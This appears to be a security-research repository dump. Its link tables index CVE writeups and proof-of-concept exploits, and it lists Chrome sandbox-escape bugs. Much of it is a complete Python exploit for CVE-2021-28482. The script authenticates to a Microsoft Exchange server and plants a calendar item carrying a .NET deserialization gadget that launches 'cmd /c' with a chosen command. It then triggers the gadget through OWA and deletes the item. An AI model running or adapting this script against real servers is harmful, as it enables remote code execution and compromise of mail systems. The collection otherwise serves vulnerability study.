├── PoCs
    ├── CVE-2021-28482.py
    └── apple
    │   └── CVE-2021-30949
    │       ├── README.md
    │       └── portal21_release.zip
├── README.md
└── chrome-sbx-db.md


/PoCs/CVE-2021-28482.py:
--------------------------------------------------------------------------------
  1 | import requests
  2 | import time
  3 | import sys
  4 | from base64 import b64encode
  5 | from requests_ntlm2 import HttpNtlmAuth
  6 | from urllib3.exceptions import InsecureRequestWarning
  7 | from urllib import quote_plus
  8 | 
  9 | requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
 10 | 
 11 | target = ""
 12 | username = "john"
 13 | pwd = ""
 14 | cmd = "mspaint.exe"
 15 | 
 16 | 
 17 | def escape(_str):
 18 |     _str = _str.replace("&", "&")
 19 |     _str = _str.replace("<", "&lt;")
 20 |     _str = _str.replace(">", "&gt;")
 21 |     _str = _str.replace("\"", "&quot;")
 22 |     return _str
 23 | 
 24 | 
 25 | payload2 = """
 26 | <ArrayOfKeyValueOfstringProposeOptionsMeetingPollParametersE_S0982HC z:Id="1" z:Size="1"
 27 |     xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"
 28 |     xmlns:i="http://www.w3.org/2001/XMLSchema-instance"
 29 |     xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/">
 30 |     <KeyValueOfstringProposeOptionsMeetingPollParametersE_S0982HC>
 31 |         <Key z:Id="2">ahihi</Key>
 32 |         <Value z:Id="3"
 33 |             xmlns:a="http://schemas.datacontract.org/2004/07/Microsoft.Exchange.Entities.DataModel.Calendaring.CustomActions">
 34 |             <ChangedProperties xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Exchange.Entities.DataModel"
 35 |                 xmlns:b="http://schemas.datacontract.org/2004/07/Microsoft.Exchange.Entities.DataModel.PropertyBags">
 36 |                 <b:propertyValues z:Size="1"
 37 |                     xmlns:c="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
 38 |                     <c:KeyValueOfstringanyType>
 39 |                         <c:Key>asdasdasdasdasd</c:Key>
 40 |                         <c:Value">
 41 |                             <ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL xmlns="http://schemas.datacontract.org/2004/07/System.Data.Services.Internal"
 42 |                                                          xmlns:c="http://www.w3.org/2001/XMLSchema"
 43 |                                                          xmlns:i="http://www.w3.org/2001/XMLSchema-instance"
 44 |                                                          xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/"
 45 |                                                          >
 46 |                             <root type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]],System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
 47 |                               <ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL xmlns="http://schemas.datacontract.org/2004/07/System.Data.Services.Internal"
 48 |                                                                                   xmlns:c="http://www.w3.org/2001/XMLSchema"
 49 |                                                                                   xmlns:i="http://www.w3.org/2001/XMLSchema-instance"
 50 |                                                                                   xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/"
 51 |                                                                                   >
 52 |                                 <ExpandedElement z:Id="ref1" >
 53 |                                   <__identity i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System"/>
 54 |                                 </ExpandedElement>
 55 |                                 <ProjectedProperty0 xmlns:a="http://schemas.datacontract.org/2004/07/System.Windows.Data">
 56 |                                   <a:MethodName>Start</a:MethodName>
 57 |                                   <a:MethodParameters xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
 58 |                                     <b:anyType i:type="c:string">cmd</b:anyType>
 59 |                                     <b:anyType i:type="c:string">/c %s</b:anyType>
 60 |                                   </a:MethodParameters>
 61 |                                   <a:ObjectInstance z:Ref="ref1"/>
 62 |                                 </ProjectedProperty0>
 63 |                               </ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL>
 64 |                           </root>
 65 |                         </c:Value>
 66 |                     </c:KeyValueOfstringanyType>
 67 |                 </b:propertyValues>
 68 |             </ChangedProperties>
 69 |             <OriginalTypeAssembly z:Id="12" i:nil="true"
 70 |                 xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Exchange.Entities.DataModel">Microsoft.Exchange.Entities.DataModel, Version=15.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35</OriginalTypeAssembly>
 71 |             <OriginalTypeName z:Id="14"
 72 |                 xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Exchange.Entities.DataModel">Microsoft.Exchange.Entities.DataModel.Calendaring.CustomActions.ProposeOptionsMeetingPollParameters</OriginalTypeName>
 73 |         </Value>
 74 |     </KeyValueOfstringProposeOptionsMeetingPollParametersE_S0982HC>
 75 | </ArrayOfKeyValueOfstringProposeOptionsMeetingPollParametersE_S0982HC>""" % escape(
 76 |     cmd)
 77 | payload2 = escape(payload2)
 78 | payload1 = """<?xml version="1.0" encoding="utf-8"?>
 79 | <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
 80 |                xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" 
 81 |                xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" 
 82 |                xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
 83 |   <soap:Header>
 84 |     <t:RequestServerVersion Version="Exchange2016" />
 85 |     <t:TimeZoneContext>
 86 |       <t:TimeZoneDefinition Name="(UTC-08:00) Pacific Time (US &amp;amp; Canada)" Id="Pacific Standard Time">
 87 |         <t:Periods>
 88 |           <t:Period Bias="P0DT8H0M0.0S" Name="Standard" Id="Std" />
 89 |           <t:Period Bias="P0DT7H0M0.0S" Name="Daylight" Id="Dlt/1" />
 90 |           <t:Period Bias="P0DT7H0M0.0S" Name="Daylight" Id="Dlt/2007" />
 91 |         </t:Periods>
 92 |         <t:TransitionsGroups>
 93 |           <t:TransitionsGroup Id="0">
 94 |             <t:RecurringDayTransition>
 95 |               <t:To Kind="Period">Dlt/1</t:To>
 96 |               <t:TimeOffset>P0DT2H0M0.0S</t:TimeOffset>
 97 |               <t:Month>4</t:Month>
 98 |               <t:DayOfWeek>Sunday</t:DayOfWeek>
 99 |               <t:Occurrence>1</t:Occurrence>
100 |             </t:RecurringDayTransition>
101 |             <t:RecurringDayTransition>
102 |               <t:To Kind="Period">Std</t:To>
103 |               <t:TimeOffset>P0DT2H0M0.0S</t:TimeOffset>
104 |               <t:Month>10</t:Month>
105 |               <t:DayOfWeek>Sunday</t:DayOfWeek>
106 |               <t:Occurrence>-1</t:Occurrence>
107 |             </t:RecurringDayTransition>
108 |           </t:TransitionsGroup>
109 |           <t:TransitionsGroup Id="1">
110 |             <t:RecurringDayTransition>
111 |               <t:To Kind="Period">Dlt/2007</t:To>
112 |               <t:TimeOffset>P0DT2H0M0.0S</t:TimeOffset>
113 |               <t:Month>3</t:Month>
114 |               <t:DayOfWeek>Sunday</t:DayOfWeek>
115 |               <t:Occurrence>2</t:Occurrence>
116 |             </t:RecurringDayTransition>
117 |             <t:RecurringDayTransition>
118 |               <t:To Kind="Period">Std</t:To>
119 |               <t:TimeOffset>P0DT2H0M0.0S</t:TimeOffset>
120 |               <t:Month>11</t:Month>
121 |               <t:DayOfWeek>Sunday</t:DayOfWeek>
122 |               <t:Occurrence>1</t:Occurrence>
123 |             </t:RecurringDayTransition>
124 |           </t:TransitionsGroup>
125 |         </t:TransitionsGroups>
126 |         <t:Transitions>
127 |           <t:Transition>
128 |             <t:To Kind="Group">0</t:To>
129 |           </t:Transition>
130 |           <t:AbsoluteDateTransition>
131 |             <t:To Kind="Group">1</t:To>
132 |             <t:DateTime>2007-01-01T08:00:00.000Z</t:DateTime>
133 |           </t:AbsoluteDateTransition>
134 |         </t:Transitions>
135 |       </t:TimeZoneDefinition>
136 |     </t:TimeZoneContext>
137 |   </soap:Header>
138 |   <soap:Body>
139 |     <m:CreateItem SendMeetingInvitations="SendToAllAndSaveCopy">
140 |       <m:Items>
141 |         <t:CalendarItem>
142 |           <t:Subject>Weekly Update Meeting</t:Subject>
143 | 			<t:ExtendedProperty>
144 | 			<t:ExtendedFieldURI PropertySetId="11000e07-b51b-40d6-af21-caa85edab1d0"
145 | 			              PropertyName="MeetingPollProposeOptionsRequestsBlob" PropertyType="String" />
146 | 			            <t:Value>%s</t:Value>
147 | 			</t:ExtendedProperty>
148 |           <t:Body BodyType="HTML">Come hear about how the Organized Observational Paradigm SkyNet project is coming along!</t:Body>
149 |           <t:ReminderMinutesBeforeStart>30</t:ReminderMinutesBeforeStart>
150 |           <t:Start>2021-04-22T06:45:32.868-08:00</t:Start>
151 |           <t:End>2021-04-22T06:55:32.868-08:00</t:End>
152 |           <t:Location>Contoso Main Gallery</t:Location>
153 |           <t:RequiredAttendees>
154 |             <t:Attendee>
155 |               <t:Mailbox>
156 |                 <t:EmailAddress>Administrator@evil.corp</t:EmailAddress>
157 |               </t:Mailbox>
158 |             </t:Attendee>
159 |             <t:Attendee>
160 |               <t:Mailbox>
161 |                 <t:EmailAddress>john@evil.corp</t:EmailAddress>
162 |               </t:Mailbox>
163 |             </t:Attendee>
164 |             <t:Attendee>
165 |               <t:Mailbox>
166 |                 <t:EmailAddress>mart@evil.corp</t:EmailAddress>
167 |               </t:Mailbox>
168 |             </t:Attendee>
169 |           </t:RequiredAttendees>
170 |           <t:Recurrence>
171 |             <t:DailyRecurrence>
172 |               <t:Interval>1</t:Interval>
173 |             </t:DailyRecurrence>
174 |             <t:NumberedRecurrence>
175 |               <t:StartDate>2021-04-22T06:45:32.868-08:00</t:StartDate>
176 |               <t:NumberOfOccurrences>2</t:NumberOfOccurrences>
177 |             </t:NumberedRecurrence>
178 |           </t:Recurrence>
179 |         </t:CalendarItem>
180 |       </m:Items>
181 |     </m:CreateItem>
182 |   </soap:Body>
183 | </soap:Envelope>
184 | """ % payload2
185 | 
186 | res = requests.post("https://%s/ews/Exchange.asmx" % target,
187 |                     data=payload1,
188 |                     headers={
189 |                         "Content-type": "text/xml; charset=utf-8",
190 |                     },
191 |                     verify=False,
192 |                     auth=HttpNtlmAuth('%s' % (username), pwd))
193 | 
194 | if res.status_code != 200:
195 |     print("error 1")
196 |     exit()
197 | ct = res.content
198 | item_id = ct.split('<t:ItemId Id="')[1].split('"')[0]
199 | change_key = ct.split('ChangeKey="')[1].split('"')[0]
200 | print "Attacking target %s with user %s" % (target, username)
201 | 
202 | print "Sending command cmd.exe /c %s" % cmd
203 | session = requests.Session()
204 | header = {"Cookie": "mkt=en-US"}
205 | 
206 | data = {
207 |     "destination": "https://%s/owa" % target,
208 |     "flags": "",
209 |     "username": username,
210 |     "password": pwd
211 | }
212 | 
213 | res = session.post("https://%s/owa/auth.owa" % target,
214 |                    headers=header,
215 |                    data=data,
216 |                    verify=False)
217 | # print(res.status_code)
218 | # print(res.headers)
219 | cookie_obj = requests.cookies.create_cookie(domain=target,
220 |                                             name="mkt",
221 |                                             value="en-US")
222 | session.cookies.set_cookie(cookie_obj)
223 | owa_canary = session.cookies.get_dict()['X-OWA-CANARY']
224 | 
225 | r1 = session.post(
226 |     "https://%s/owa/lang.owa" % target,
227 |     data=
228 |     "destination=%2Fowa%2F%3FbO%3D1&localeName=en-US&tzid=SE+Asia+Standard+Time&saveLanguageAndTimezone=1&X-OWA-CANARY="
229 |     + owa_canary,
230 |     headers={"Content-Type": "application/x-www-form-urlencoded"},
231 |     verify=False,
232 |     allow_redirects=False)
233 | 
234 | r2 = session.get(
235 |     "https://%s/owa/MeetingPollHandler.ashx?PayloadType=ApproveProposedOptions&ItemId=OID.%s.2021/04/22&RequestId=123123123"
236 |     % (target, quote_plus(item_id)),
237 |     verify=False,
238 |     allow_redirects=False)
239 | 
240 | print "Attack successful!"
241 | 
242 | print "Cleaning up ..."
243 | 
244 | req_del = """<?xml version="1.0" encoding="utf-8"?>
245 | <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
246 |                xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" 
247 |                xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" 
248 |                xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
249 |   <soap:Header>
250 |     <t:RequestServerVersion Version="Exchange2016" />
251 |     <t:TimeZoneContext>
252 |       <t:TimeZoneDefinition Id="Pacific Standard Time" />
253 |     </t:TimeZoneContext>
254 |   </soap:Header>
255 |   <soap:Body>
256 |     <m:DeleteItem DeleteType="MoveToDeletedItems" SendMeetingCancellations="SendToAllAndSaveCopy">
257 |       <m:ItemIds>
258 |         <t:ItemId Id="%s" ChangeKey="%s" />
259 |       </m:ItemIds>
260 |     </m:DeleteItem>
261 |   </soap:Body>
262 | </soap:Envelope>""" % (item_id, change_key)
263 | 
264 | res = requests.post("https://%s/ews/Exchange.asmx" % target,
265 |                     data=req_del,
266 |                     headers={
267 |                         "Content-type": "text/xml; charset=utf-8",
268 |                     },
269 |                     verify=False,
270 |                     auth=HttpNtlmAuth('%s' % (username), pwd))
271 | 


--------------------------------------------------------------------------------
/PoCs/apple/CVE-2021-30949/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2021-30949
2 | 


--------------------------------------------------------------------------------
/PoCs/apple/CVE-2021-30949/portal21_release.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/joydo/CVE-Writeups/394fdae26c92267916b11ceaa221a6fd82b00b7b/PoCs/apple/CVE-2021-30949/portal21_release.zip


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Exploits-Writeups
 2 | 
 3 | ## CVE-Writeups
 4 | 
 5 | > **2022 cve-reports-writeups**
 6 | 
 7 | |CVE-ID|writeups|
 8 | |-------|---------|
 9 | |CVE-2022-0185(**Linux Kernel**)|1. https://www.willsroot.io/2022/01/cve-2022-0185.html 2. https://www.openwall.com/lists/oss-security/2022/01/25/14|
10 | 
11 | 
12 | > **2021 cve-reports-writeups**
13 | 
14 | |CVE-ID|writeups|
15 | |-------|---------|
16 | | CVE-2014-3153 |https://elongl.github.io/exploitation/2021/01/08/cve-2014-3153.html|
17 | |CVE-2021-1647|https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1647.html|
18 | |CVE-2021-3156|https://github.com/r4j0x00/exploits/blob/master/CVE-2021-3156/exploit.c|
19 | |CVE-2021-20226|https://www.zerodayinitiative.com/blog/2021/4/22/cve-2021-20226-a-reference-counting-bug-in-the-linux-kernel-iouring-subsystem|
20 | |CVE-2021-1732|https://www.yuque.com/posec/public/qvzr6g|
21 | |CVE-2021-1782(IOS)|https://www.synacktiv.com/en/publications/analysis-and-exploitation-of-the-ios-kernel-vulnerability-cve-2021-1782.html|
22 | |CVE-2021–30657|https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508|
23 | |CVE-2021-30747(**MacOS**)|https://m1racles.com/|
24 | |CVE-2021-28476(**Windows**)|https://labs.bluefrostsecurity.de/advisories/bfs-sa-2021-001/|
25 | |CVE-2021-3492(**Ubuntu**)|https://www.synacktiv.com/publications/exploitation-of-a-double-free-vulnerability-in-ubuntu-shiftfs-driver-cve-2021-3492.html|
26 | |CVE-2021-22555(**Linux Kernel**)|https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html|
27 | |CVE-2021-33909(**Linux eBPF**)|https://www.qualys.com/2021/07/20/cve-2021-33909/sequoia-local-privilege-escalation-linux.txt|
28 | |CVE-2021-30807(**MacOSX&iOS Panic**)|https://saaramar.github.io/IOMobileFrameBuffer_LPE_POC/|
29 | |CVE-2021-3490(**Ubuntu eBPF**)|https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story|
30 | |CVE-2021-26084(**Atlassian Confluence Server**)|https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md|
31 | |CVE-2021-44733(**Linux TEE subsystem UAF**)|https://github.com/pjlantz/optee-qemu|
32 | |CVE-2021-30916(**macOS,iOS**)|https://www.cyberkl.com/cvelist/cvedetail/33|
33 | |CVE-2021-30909(**macOS,iOS**)|https://www.cyberkl.com/cvelist/cvedetail/38|
34 | |CVE-2021-30907(**IOS**)|https://www.cyberkl.com/cvelist/cvedetail/42|
35 | |CVE-2021-30970(**MacOS**)|https://www.microsoft.com/security/blog/2022/01/10/new-macos-vulnerability-powerdir-could-lead-to-unauthorized-user-data-access/|
36 | 
37 | > **2020 cve-reports-writeups**
38 | 
39 | |CVE-ID|writeups|
40 | |-------|---------|
41 | |CVE-2020-25577|https://blog.quarkslab.com/bad-neighbor-on-freebsd-ipv6-router-advertisement-vulnerabilities-in-rtsold-cve-2020-25577.html|
42 | |CVE-2020-24490,CVE-2020-12352,CVE-2020-12351|https://google.github.io/security-research/pocs/linux/bleedingtooth/writeup.html|
43 | |CVE-2020-16040|https://github.com/r4j0x00/exploits/blob/master/CVE-2020-16040/exploit.js|
44 | |CVE-2020-6507|https://github.com/r4j0x00/exploits/blob/master/chrome-exploit/exploit.js|
45 | |CVE-2020-10367|https://naehrdine.blogspot.com/2021/04/bluetooth-wi-fi-code-execution-wi-fi.html|
46 | |CVE-2020-27950(IOS)|https://www.synacktiv.com/en/publications/ios-1-day-hunting-uncovering-and-exploiting-cve-2020-27950-kernel-memory-leak.html|
47 | 
48 | > **CVE-PoCs**
49 | 
50 | |CVE-ID|poc links|Topic|
51 | |-------|-------|-----|
52 | |CVE-2021-27905|https://github.com/Henry4E36/Solr-SSRF|**Apache Solr SSRF**|
53 | |CVE-2021-26814|https://github.com/WickdDavid/CVE-2021-26814|A simple python PoC to exploit CVE-2021-26814 and gain RCE on Wazuh Manager (v.4.0.0-4.0.3) through the API service|
54 | |CVE-2021-21985|https://github.com/xnianq/cve-2021-21985_exp| vSphere Client (HTML5) RCE |
55 | 
56 | ## Non-CVE-Writeups
57 | 
58 | |Exploit-Time |Title|Reference|
59 | |-------|---------|-------|
60 | |2020|Zero click vulnerability in Apple’s macOS Mail|https://mikko-kenttala.medium.com/zero-click-vulnerability-in-apples-macos-mail-59e0c14b106c|
61 | |2021|A new JavaScript-based attack-SMASH |https://www.vusec.net/projects/smash/|
62 | |2021(CVE-2021-30657 Deeper Analysis)|All Your Macs Are Belong To Us bypassing macOS's file quarantine, gatekeeper, and notarization requirements|https://objective-see.com/blog/blog_0x64.html|
63 | |2021|Patch Gapping a Safari Type Confusion(**IOS**)|https://blog.theori.io/research/webkit-type-confusion/|
64 | |2021|WebKit RCE on ios 14.1(**IOS**)|https://gist.github.com/ujin5/6b9a32eedc5a39d714a3a72f06efffe5|
65 | |2021|IOS Jitterbug(**IOS Function**)|https://github.com/osy/Jitterbug|
66 | |2021|Zoom RCE from Pwn2Own 2021|https://sector7.computest.nl/post/2021-08-zoom/|
67 | |2021|Apache Dubbo: All roads lead to RCE|https://securitylab.github.com/research/apache-dubbo/|
68 | 


--------------------------------------------------------------------------------
/chrome-sbx-db.md:
--------------------------------------------------------------------------------
  1 | # Case Study of Chrome Sandbox Escape
  2 | A Collection of Chrome Sandbox Escape POCs/Exploits for learning.
  3 | 
  4 | ## Permission Allowed Issues  
  5 | 
  6 | Issue | Type | Summary | Label | Reporter | Links
  7 | -- | -- | -- | -- | -- | --
  8 | [crbug-1062091](https://crbug.com/1062091) | MojoJS POC | UAF in InstalledAppProviderImpl | M-81, reward-25000 | [Tim Becker](https://crbug.com/?q=reporter%3Atjbecker%40theori.io&can=1) | [Theori Blog](https://theori.io/research/escaping-chrome-sandbox/) 
  9 | [crbug-1055393](https://crbug.com/1055393) | HTML POC | UAF in Accessibility | M-81, M-82, reward-20000 | [Pawel Wylecial](https://crbug.com/?q=reporter%3Apawel%40blackowlsec.com&can=1) | [RedTeam Blog](https://blog.redteam.pl/2020/04/google-chrome-display-locking-fuzzing.html)
 10 | [crbug-1041406](https://crbug.com/1041406) | HTML POC | UAF in Portals | reward-20000 | [Pawel Wylecial](https://crbug.com/?q=reporter%3Apawel%40blackowlsec.com&can=1) | [RedTeam Blog](https://blog.redteam.pl/2020/04/google-chrome-display-locking-fuzzing.html)
 11 | [crbug-1035399](https://crbug.com/1035399) | Patch POC | Site Isolation Bypass in BlobURL | CVE-2020-6385, M-79 | [Sergey Glazunov](https://crbug.com/?q=reporter%3Aserg.glazunov%40gmail.com%2Cglazunov%40google.com%20OR%20reward_to-glazunov_at_google.com&can=1) | [p0-1991](https://crbug.com/project-zero/1991) 
 12 | [crbug-1031142](https://crbug.com/1031142) | Full Chain Exploit | UAF in DesktopMedia, Logic Bug in Extensions (Site Isolation Bypass) | CVE-2020-6380, CVE-2020-6424, CVE-2020-6425, CVE-2020-6435, CVE-2020-6485, CVE-2019-13767, M-79, M-80 | [Sergey Glazunov](https://crbug.com/?q=reporter%3Aserg.glazunov%40gmail.com%2Cglazunov%40google.com%20OR%20reward_to-glazunov_at_google.com&can=1) | [crbug-1031653](https://crbug.com/1031653), [crbug-1031670](https://crbug.com/1031670), [crbug-1032158](https://crbug.com/1032158), [crbug-1032170](https://crbug.com/1032170), [crbug-1038996](https://crbug.com/1038996), [crbug-1047285](https://crbug.com/1047285), [p0-1985](https://crbug.com/project-zero/1985) 
 13 | [crbug-1027152](https://crbug.com/1027152) | Patch POC | Heap Overflow in PasswordFormManager | CVE-2019-13726, M-78 | [Sergey Glazunov](https://crbug.com/?q=reporter%3Aserg.glazunov%40gmail.com%2Cglazunov%40google.com%20OR%20reward_to-glazunov_at_google.com&can=1) | [p0-1972](https://crbug.com/project-zero/1972) 
 14 | [crbug-1025067](https://crbug.com/1025067) | MojoJS POC | UAF in BluetoothAdapter | CVE-2019-13725, M-78, M-79, reward-20000 | [Gengming Liu](https://crbug.com/?q=Gengming%20Liu%20OR%20l.dmxcsnsbh%40gmail.com&can=1), Jianyu Chen | - 
 15 | [crbug-1024121](https://crbug.com/1024121) | MojoJS POC | UAF in WebBluetoothServiceImpl | CVE-2019-13723, M-78, M-79, reward-20000 | [Yuxiang Li](https://crbug.com/?q=reporter%3Axbalien29%40gmail.com&can=1) | - 
 16 | [crbug-1024116](https://crbug.com/1024116) | MojoJS POC | OOB Access in WebBluetoothServiceImpl | CVE-2019-13724, M-78, reward-20000 | [Yuxiang Li](https://crbug.com/?q=reporter%3Axbalien29%40gmail.com&can=1) | - 
 17 | [crbug-1007194](https://crbug.com/1007194) | WriteUp | UAF in MojoCdmProxyService | CVE-2019-13765, M-77, reward-5000 | [Guang Gong](https://crbug.com/?q=Guang%20Gong%20OR%20reporter%3Ahigongguang%40gmail.com&can=1) | [crbug-999311](https://crbug.com/999311)
 18 | [crbug-1005753](https://crbug.com/1005753) | Patch POC | UAF in IndexedDB | CVE-2019-13693, M-77, M-78, reward-20500 | [Guang Gong](https://crbug.com/?q=Guang%20Gong%20OR%20reporter%3Ahigongguang%40gmail.com&can=1) | -
 19 | [crbug-1004730](https://crbug.com/1004730) | Patch POC | UAF in MojoAudioDecoder | CVE-2019-13695, M-77, reward-15000 | [Man Yue Mo](https://crbug.com/?can=1&q=reporter%3Ammo%40semmle.com) | -
 20 | [crbug-1001503](https://crbug.com/1001503) | MojoJS POC | UAF in Aura | CCVE-2019-13699, M-77, reward-20000 | [Man Yue Mo](https://crbug.com/?can=1&q=reporter%3Ammo%40semmle.com) | -
 21 | [crbug-1000934](https://crbug.com/1000934) | HTML POC | UAF in Sharing | CVE-2019-13685, M-77, M-78, reward-15000 | [chromium.khalil](https://crbug.com/?q=reporter%3Achromium.khalil%40gmail.com&can=1) | -
 22 | [crbug-1000002](https://crbug.com/1000002) | MojoJS POC | UAF in OfflinePage2 (Android) | CVE-2019-13686, M-76, reward-20000 | [Brendon Tiszka](https://crbug.com/?q=reporter%3Abtiszka%40gmail.com&can=1) | -
 23 | [crbug-998548](https://crbug.com/998548) | MojoJS POC | UAF in ImageCapture | CVE-2019-13687, M-76, M-77, M-78, reward-20000 | [Man Yue Mo](https://crbug.com/?can=1&q=reporter%3Ammo%40semmle.com) | -
 24 | [crbug-998431](https://crbug.com/998431) | MojoJS POC | Heap Overflow in GamepadService | CVE-2019-13700, M-77, reward-15000 | [Man Yue Mo](https://crbug.com/?can=1&q=reporter%3Ammo%40semmle.com) | -
 25 | [crbug-997190](https://crbug.com/997190) | Patch POC | UAF in MediaSession (Android) | CVE-2019-5876, M-76, reward-20000 | [Man Yue Mo](https://crbug.com/?can=1&q=reporter%3Ammo%40semmle.com) | -
 26 | [crbug-996741](https://crbug.com/996741) | Patch POC | Logic Bug in Payment Handler API | M-76 | [Sergey Glazunov](https://crbug.com/?q=reporter%3Aserg.glazunov%40gmail.com%2Cglazunov%40google.com%20OR%20reward_to-glazunov_at_google.com&can=1) | [p0-1928](https://crbug.com/project-zero/1928)
 27 | [crbug-995964](https://crbug.com/995964) | MojoJS POC | UAF in VideoCapture | CVE-2019-13688, M-77, M-78, reward-20000 | [Man Yue Mo](https://crbug.com/?can=1&q=reporter%3Ammo%40semmle.com) | -
 28 | [crbug-993223](https://crbug.com/993223) | HTML POC | UAF in Payment | M-77, reward-5000 | [chromium.khalil](https://crbug.com/?q=reporter%3Achromium.khalil%40gmail.com&can=1) | [crbug-992285](https://crbug.com/992285)
 29 | [crbug-987261](https://crbug.com/987261) | HTML POC | Logic Bug in WebUI | - | [Vladimir Metnew](https://crbug.com/?q=reporter%3Avladimirmetnew%40gmail.com%20OR%20Vladimir%20Metnew&can=1) | -
 30 | [crbug-986211](https://crbug.com/986211#c42) | Webserver POC | Heap Overflow in Network Service | M-76 | [Mark Brand](https://crbug.com/?q=reporter%3Amarkbrand%40google.com&can=1), [Sergey Glazunov](https://crbug.com/?q=reporter%3Aserg.glazunov%40gmail.com%2Cglazunov%40google.com%20OR%20reward_to-glazunov_at_google.com&can=1) | [P0 Blog1](https://googleprojectzero.blogspot.com/2020/02/several-months-in-life-of-part1.html), [P0 Blog2](https://googleprojectzero.blogspot.com/2020/02/several-months-in-life-of-part2.html) 
 31 | [crbug-984521](https://crbug.com/984521) | MojoJS POC | UAF in IndexedDB IndexedDBConnection::Close | M-76 | [Mark Brand](https://crbug.com/?q=reporter%3Amarkbrand%40google.com&can=1) | [p0-1912](https://crbug.com/project-zero/1912) 
 32 | [crbug-981873](https://crbug.com/981873) | MojoJS POC | UAF in IndexedDB ~LevelDBIteratorImpl | M-76 | [Mark Brand](https://crbug.com/?q=reporter%3Amarkbrand%40google.com&can=1) | [p0-1904](https://crbug.com/project-zero/1904) 
 33 | [crbug-977462](https://crbug.com/977462) | MojoJS POC | UAF in OfflinePage (Android) | CVE-2019-5850, M-75, reward-10000 | [Brendon Tiszka](https://crbug.com/?q=reporter%3Abtiszka%40gmail.com&can=1) | [crbug-977195](https://crbug.com/977195) 
 34 | [crbug-972239](https://crbug.com/972239#c26) | MojoJS POC | UAF in IndexedDB IndexedDBTransaction::Abort | M-76 | [Mark Brand](https://crbug.com/?q=reporter%3Amarkbrand%40google.com&can=1) | - 
 35 | [crbug-971702](https://crbug.com/971702) | HTML POC | UAF in chrome!content::Portal::Activate | M-76, reward-8000 | [Pawel Wylecial](https://crbug.com/?q=reporter%3Apawel%40blackowlsec.com&can=1) | [crbug-968142](https://crbug.com/968142), [RedTeam Blog](https://blog.redteam.pl/2019/12/chrome-portal-element-fuzzing.html)
 36 | [crbug-966784](https://crbug.com/966784) | MojoJS POC | UAF in IndexedDB AbortAllTransactions | M-76, reward-5000 | [cdsrc2016](https://crbug.com/?q=reporter%3Acdsrc2016%40gmail.com&can=1) | -
 37 | [crbug-966762](https://crbug.com/966762) | MojoJS POC | UAF in IndexedDB RequestComplete 2 | M-76, reward-10500 | [cdsrc2016](https://crbug.com/?q=reporter%3Acdsrc2016%40gmail.com&can=1) | -
 38 | [crbug-962500](https://crbug.com/962500) | HTML POC | Logic Bug in WebUI | reward-10000 | [Michal Bentkowski](https://crbug.com/?q=Michal%20Bentkowski&can=1) | -
 39 | [crbug-960484](https://crbug.com/960484) | MojoJS POC | UAF in SerialChooserController | M-75 | [jonorman](https://crbug.com/?q=reporter%3Ajonorman%40microsoft.com&can=1) | -
 40 | [crbug-956597](https://crbug.com/956597) | HTML POC | UAF in ServiceWorkerPaymentInstrument | M-75, M-76, reward-5000 | [leecraso](https://crbug.com/?q=reporter%3Aleecraso%40gmail.com&can=1), [Guang Gong](https://crbug.com/?q=Guang%20Gong%20OR%20reporter%3Ahigongguang%40gmail.com&can=1) | - 
 41 | [crbug-948172](https://crbug.com/948172) | Full Chain Exploit | Logic Bug in PDF plugin using Pepper Socket API | M-75 | [Sergey Glazunov](https://crbug.com/?q=reporter%3Aserg.glazunov%40gmail.com%2Cglazunov%40google.com%20OR%20reward_to-glazunov_at_google.com&can=1) | [Full Chain Exploit](https://bugs.chromium.org/p/project-zero/issues/attachment?aid=402215&signed_aid=uJieSMQe19F_G21FV0OaCg==), [crbug-950005](https://crbug.com/950005), [p0-1813](https://crbug.com/project-zero/1813), [p0-1817](https://crbug.com/project-zero/1817)
 42 | [crbug-945370](https://crbug.com/945370) | HTML POC | UAF in IndexedDB DeleteRequest | M-75, reward-8000 | [cdsrc2016](https://crbug.com/?q=reporter%3Acdsrc2016%40gmail.com&can=1) | -
 43 | [crbug-942898](https://crbug.com/942898) | HTML POC | UAF in  IndexedDB RequestComplete | M-74, reward-10000 | [cdsrc2016](https://crbug.com/?q=reporter%3Acdsrc2016%40gmail.com&can=1) | -
